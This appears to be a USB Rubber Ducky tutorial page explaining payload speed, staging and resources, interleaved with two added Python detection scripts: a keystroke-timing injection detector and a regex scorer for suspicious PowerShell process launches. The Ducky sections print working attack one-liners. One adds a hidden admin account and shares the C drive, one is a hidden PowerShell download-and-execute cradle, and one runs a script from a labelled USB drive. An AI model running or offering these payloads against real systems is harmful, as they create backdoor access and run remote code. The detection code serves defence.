Payload Principles
There are a few characteristics of a USB Rubber Ducky payload that should be understood in order to craft a successful attack. Regardless of any obfuscation or persistence techniques used, a payload can be defined by its speed, stages and resources.
Understanding these principles will help you to craft the most efficient payload for your task. Some of the most advanced attacks employ techniques to optimize for speed, even while utilizing multiple stages from numerous resources.

Speed

Speed should be mostly obvious. A fast, medium or slow payload depends on its complexity. With additional complexity comes slower, more conservative delivery in order to ensure reliability. That's not to say a fast payload can't complete a complex objective. Fast payloads simply require more finesse.
For example, if the objective is to inject and execute a Visual Basic script on a typical Windows system, one could go about it a number of ways. The first may be to open Notepad, type in the Visual Basic script content, save the file, close Notepad, open the command prompt and execute the script. This requires navigating a number of graphical elements, from Notepad and its save dialog to the command prompt. A faster and thus more robust method would be to open only one window, the command prompt, and use the esoteric "copy con" command to write the Visual Basic script file directly from the terminal. Doing so is faster, less complex and more reliable.
The ultimate in fast, reliable payloads may be the Run dialog one-liners. Without the need for further interaction after opening the ubiquitous dialog with the famed Windows+R keyboard combo, typing in a string of commands and pressing enter, these execute in just a couple of seconds.
REM A one-liner to add user "ts" (password "ts") to the admin group and share the C drive
DELAY 1000
GUI r
DELAY 100
STRING powershell -Exec Bypass "saps cmd '/C net User ts ts /ADD&net LocalGroup Administrators ts /ADD&netsh advfirewall firewall set rule group="""File and Printer Sharing""" new enable=Yes&net share ts=c:\ /UNLIMITED&icacls c:* /grant ts:(OI)(CI)F' -Verb RunAs"
ENTER
DELAY 1000
REM Accept the UAC elevation prompt raised by -Verb RunAs
ALT y
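Because the device delivers its payload as typed keystrokes, the speed that makes a Run dialog one-liner reliable is also something a defender can measure. The following is an added example and not part of the Hak5 page: it groups a keystroke stream into bursts and labels a burst as injected when its median inter-key gap is far below human typing cadence. The thresholds (a median under 15 ms across a run of at least 20 keys), the 500 ms burst separator and the sample stream are assumptions constructed for illustration.

```python
"""Flag keystroke bursts typed faster than a human plausibly can.

Added example (not from the Hak5 page). Thresholds and the sample
stream are assumptions chosen for illustration.
"""
from dataclasses import dataclass
from statistics import median

# Assumed thresholds: a sustained median gap under 15 ms across a run of
# 20+ keys is treated as injected; human typists rarely sustain < 50 ms.
INJECTED_MEDIAN_MS = 15.0
MIN_RUN_KEYS = 20
BURST_GAP_MS = 500.0


@dataclass
class KeyEvent:
    t_ms: float   # timestamp in milliseconds since capture start
    key: str      # the character or key name that was typed


def split_runs(events, gap_ms=BURST_GAP_MS):
    """Split a key event stream into bursts separated by pauses > gap_ms."""
    runs, current = [], []
    for ev in events:
        if current and ev.t_ms - current[-1].t_ms > gap_ms:
            runs.append(current)
            current = []
        current.append(ev)
    if current:
        runs.append(current)
    return runs


def classify_run(run):
    """Return ('injected'|'human'|'short', median_gap_ms) for one burst."""
    if len(run) < MIN_RUN_KEYS:
        return "short", None
    gaps = [b.t_ms - a.t_ms for a, b in zip(run, run[1:])]
    med = median(gaps)
    return ("injected" if med < INJECTED_MEDIAN_MS else "human"), med


def synth_events(text, start_ms, gap_ms):
    """Constructed sample: `text` typed with a fixed inter-key gap."""
    return [KeyEvent(start_ms + i * gap_ms, ch) for i, ch in enumerate(text)]


# Constructed sample stream: a person typing a sentence at ~120 ms per key,
# a pause, then a Run-dialog style command arriving at 5 ms per key.
SAMPLE = (
    synth_events("hello team, see the notes", 0.0, 120.0)
    + synth_events("powershell -Exec Bypass -W Hidden ...", 10_000.0, 5.0)
)


def analyze(events=SAMPLE):
    """Classify every burst; returns a list of (label, key_count, median_gap)."""
    return [(label, len(run), med)
            for run in split_runs(events)
            for label, med in [classify_run(run)]]


if __name__ == "__main__":
    for label, n, med in analyze():
        print(f"{label:8s} keys={n:3d} median_gap_ms={med}")
```

The per-burst median is used rather than the mean so that a single long pause inside an injected run (a DELAY between STRING lines, for instance) does not pull the burst back into the human range.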

Stages

A USB Rubber Ducky payload may be inline or staged.
An inline payload, often called a single or non-staged payload, is designed to carry out the desired task in one self-contained step. It does not rely on any external resource such as a netcat listener or Meterpreter handler. The previous example is an inline payload that adds an admin user and shares the C drive with it.
A staged payload consists of a stager and one or more stages, typically hosted on external resources such as network or mass storage. The stager payload will typically set up a network or filesystem connection to the staged payload in order for it to be executed. Once the staged payload has been executed, the USB Rubber Ducky is often free to be disconnected from the target system. This may be desirable as a staged payload may contain many complex instructions, executed without the need for the USB Rubber Ducky to be connected and typing.
The drawback to a staged payload may be visibility and reliability. Some organizations may have firewalls or intrusion detection systems configured to detect attacks, while others may have policies in place prohibiting certain network connections or even preventing the mounting of external storage.
REM An example staged payload.
REM This one-liner will download and execute a file hosted online.
DELAY 1000
GUI r
DELAY 200
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/calc.txt',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

Resources

Payloads may require external resources, that is to say more than the typical behavior of the USB Rubber Ducky in HID mode acting only as a keyboard. Common resources include the network, mass storage and "out of band" networking.
The previous example downloads and executes a binary file hosted on an external network resource. External resources are beneficial, especially as hosts for staged payloads capable of carrying out complex tasks faster than inline payloads. The drawback to a payload requiring these external resources is that they may be either blocked or noticed by systems administrators.
A staged payload may be hosted on a local USB flash drive. In this case the mass storage may either be the USB Rubber Ducky itself, with specialized firmware, or an accompanying USB device.
REM An example staged payload.
REM Run staged payload from USB drive with volume label "dk"
DELAY 3000
GUI r
DELAY 100
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\p.ps1"
ENTER
The above payload looks for a USB drive with the label "DK" and executes the PowerShell script "p.ps1" from the root of the drive.
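All three payloads on this page land the same way: a console spawned from the Run dialog, PowerShell with an execution-policy bypass, and then either local account and share creation, a network download cradle, or a lookup of a removable volume by label. The script below is an added example, not code from the Hak5 page. It scores process-creation records for those traits so that an execution-policy bypass alone does not alert, while the stager shapes above do. The record layout, rule weights and alert threshold are assumptions; the sample records are constructed, reusing the three command lines from this page alongside two benign launches.

```python
"""Score process-creation records for the stager shapes shown on this page.

Added example, not from the Hak5 page. Record layout, weights and the
alert threshold are assumptions; the sample records are constructed.
"""
import re

# (rule name, weight, pattern): patterns run case-insensitively over the
# command line. Weights are assumptions chosen so that one flag alone
# stays below ALERT_THRESHOLD while the stager shapes above cross it.
RULES = [
    ("exec_policy_bypass",  2, r"-exec(?:utionpolicy)?\s+bypass"),
    ("hidden_window",       2, r"-w(?:indowstyle)?\s+hidden"),
    ("download_cradle",     3, r"downloadfile|downloadstring|\biex\b|invoke-expression"),
    ("volume_label_lookup", 2, r"win32_volume.*label"),
    ("local_admin_add",     3, r"net\s+(?:user|localgroup)\b.*?/add"),
    ("share_or_firewall",   2, r"net\s+share|advfirewall"),
    ("runas_elevation",     1, r"-verb\s+runas"),
]
COMPILED = [(name, w, re.compile(p, re.IGNORECASE)) for name, w, p in RULES]
ALERT_THRESHOLD = 4
CONSOLES = ("powershell.exe", "cmd.exe")


def score(rec):
    """Return (score, matched rule names) for one record dict."""
    cmd = rec.get("cmd", "")
    hits = [name for name, _, rx in COMPILED if rx.search(cmd)]
    total = sum(w for name, w, _ in COMPILED if name in hits)
    # A console spawned directly by explorer.exe is how a Run dialog
    # one-liner lands; on its own that is normal, so it only adds weight.
    if (rec.get("parent", "").lower().endswith("explorer.exe")
            and rec.get("image", "").lower().endswith(CONSOLES)):
        hits.append("console_from_explorer")
        total += 1
    return total, hits


def triage(records):
    """Return [(pid, score, hits)] for records at or above ALERT_THRESHOLD."""
    alerts = []
    for rec in records:
        total, hits = score(rec)
        if total >= ALERT_THRESHOLD:
            alerts.append((rec["pid"], total, hits))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample records: two benign launches, then the three payload
# command lines from this page as a process-creation sensor would see them.
SAMPLE_RECORDS = [
    {"pid": 4001, "parent": EXPLORER, "image": r"C:\Windows\notepad.exe",
     "cmd": "notepad.exe notes.txt"},
    {"pid": 4002, "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"pid": 4003, "parent": EXPLORER, "image": PS,
     "cmd": "powershell -Exec Bypass \"saps cmd '/C net User ts ts /ADD&net LocalGroup "
            "Administrators ts /ADD&netsh advfirewall firewall set rule group=\"\"\"File and "
            "Printer Sharing\"\"\" new enable=Yes&net share ts=c:\\ /UNLIMITED&icacls c:* "
            "/grant ts:(OI)(CI)F' -Verb RunAs\""},
    {"pid": 4004, "parent": EXPLORER, "image": PS,
     "cmd": "powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object "
            "System.Net.WebClient).DownloadFile('http://example.com/calc.txt',"
            "\\\"$env:temp\\calc.exe\\\"); Start-Process \\\"$env:temp\\calc.exe\\\"\""},
    {"pid": 4005, "parent": EXPLORER, "image": PS,
     "cmd": "powershell -NoP -NonI -W Hidden -Exec Bypass \"$uP = Get-WMIObject Win32_Volume "
            "| ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\\p.ps1\""},
]

if __name__ == "__main__":
    for pid, total, hits in triage(SAMPLE_RECORDS):
        print(f"pid={pid} score={total} hits={','.join(hits)}")
```

The additive scoring is deliberate: the scheduled-task style launch (pid 4002) carries the bypass flag and scores 2, below the threshold, whereas each payload from this page combines three or more traits and scores 7 to 9. In a real deployment the same rules would run over Sysmon event 1 or an EDR's process-creation telemetry rather than the constructed dicts used here.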